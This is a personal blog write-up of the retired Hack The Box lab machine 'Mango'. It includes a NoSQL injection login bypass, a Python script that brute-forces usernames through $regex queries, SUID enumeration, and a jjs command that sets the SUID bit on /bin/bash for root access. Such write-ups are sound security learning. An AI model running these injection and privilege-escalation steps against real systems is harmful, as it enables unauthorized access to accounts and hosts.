Whilst I’m not going to post about all of the machines I try on hack the box, I’ll likely post about ones where I learnt something new, and this was an interesting one for me and took me a while to work through and think about.
I took some effort not to spoil it for myself as this is an older retired machine, but the name gives a hint that it is likely a MangoDB backend which is a noSQL database. I have some experience with basic authentication bypass, via manipulating operators in field values, such as $eq (equals), $ne (not equals).
When I checked the login page and saw the username=admin&password=admin&login=login I suspected I could attempt a simple password not equals inject to bypass the authentication process.
The response indicated that it was being processed by the backend, presumably a noSQL DB, but it redirected me to an error page, so I utilised burp to try a few other auth bypass attempts and to extract some data. It is also worth noting that the website utilises PHP which allows query string inputs into an array with brackets, thus PHP allows me to use [$regex] to search for a value in the DB.
I started by confirming this works by checking for a username starting with ‘a’ which is an obvious place to start but also I noted that admin was used in the website source as an email address.
Anyway luckily we got the expected response which is a 302.
Where a non match, which I got when repeating the test but with searching for a username starting with ‘b’ just respond with a 200.
At this point I suspect we can utilise this method to enumerate the username and potentially the password. I’m not a programmer and thus this was an interesting challenge. I did a bit more research on noSQL injection and it seemed pretty straight forward. Thus I started to write some code that would loop through the printable characters for the username, appending any that respond with a 302 with another go through the loop until we got a full username.
Therefore this is the code I wrote and run giving me the username of ‘admin’.
#!/usr/bin/env python3
import requests
import re
import string
url = 'http://staging-order.mango.htb/'
done = False
username = ""
password = ""
while not done:
done = True
for c in string.printable:
data = {
"username[$regex]": f"^{re.escape(username+c)}.*$",
"password[$ne]": "admin",
"login": "login"
}
r = requests.post(url, data=data, verify=False, allow_redirects=False)
if r.status_code == 302:
done = False
username += c
print(f"{c}")
print(f"Username: {username}")
However I’d need to extend this code so it would keep looking for additional usernames starting with other characters and then switch to checking for passwords against those usernames. I’m confident with enough time I could get this working and I still plan to do so but it would likely take me some time and I wanted to own this machine… Thus after a quick search I found the code that does just this which can be found here: https://book.hacktricks.xyz/pentesting-web/nosql-injection
After running this code (it does take a while) I get the following output showing an ‘admin’ and ‘mango’ user both with enumerated passwords.
As nmap showed that ssh was listening I tried connecting to the target with the admin account but that did not work. Trying with mango gave me access as the user mango.
Note: I always try and have something running in the background looking for other information or potential ways of exploit. To this effect I was running gobuster but it didn’t really come up with much of interest.
Once I am on the target I usually do a few things such as check /etc/passwd to see what users are available and potentially any that may have privileges, I also test ‘sudo -l ‘ to check if the user can run any command with elevated privileges. Whilst I saw the admin account in /etc/passwd nothing else stood out so I next search for files with SUID set, using the command
find / -perm -4000 2>/dev/null
This finds a few interesting files but the one that stands out to me is “/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs” which I know is an old java command line tool to interpret scripts or run an interactive shell.
I also want to upload and run linpeas.sh so I start a basic http server on my local machine via the command python3 -m http.server 80 and then utilise wget on the target to fetch linpeas.sh. Once this is run and after checking through the output it confirms that the ‘jjs’ command is a good candidate.
Prior to continuing I look for the user flag and as it is not in mango’s home directory I change to the other account I found earlier ‘admin’ via the command su – admin and here I find the user flag.
Time to check GTFOBins for a way to leverage ‘jjs’ to escalate my privileges. Using one of the examples I find which I slightly modify to set the SUID of bash so I can then run bash and elevate my access. I run the command jjs and then run:
Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /bin/bash').waitFor()
Which sets the SUID bit on the bash command which I can then run as the user with /bin/bash -p to gain a escalated bash prompt. From here it is a simple matter to get the root flag in the /root directory.
Final Thoughts
I really enjoyed this machine, especially gaining the user access as it required some noSQL injection, which I’ve only basic experience in, as SQL DB’s are more common in my experience, and also having to write some code to automate the enumeration.
This later was very interesting to me as I have not done a lot of coding since university and am trying to practice more python coding when I get the chance, which is not often. The root access was a little simple but that is typically the case once user level foothold is gained on the target.
The video of my attempt at this machine can be found here: https://youtu.be/q8gVAEWn2vg
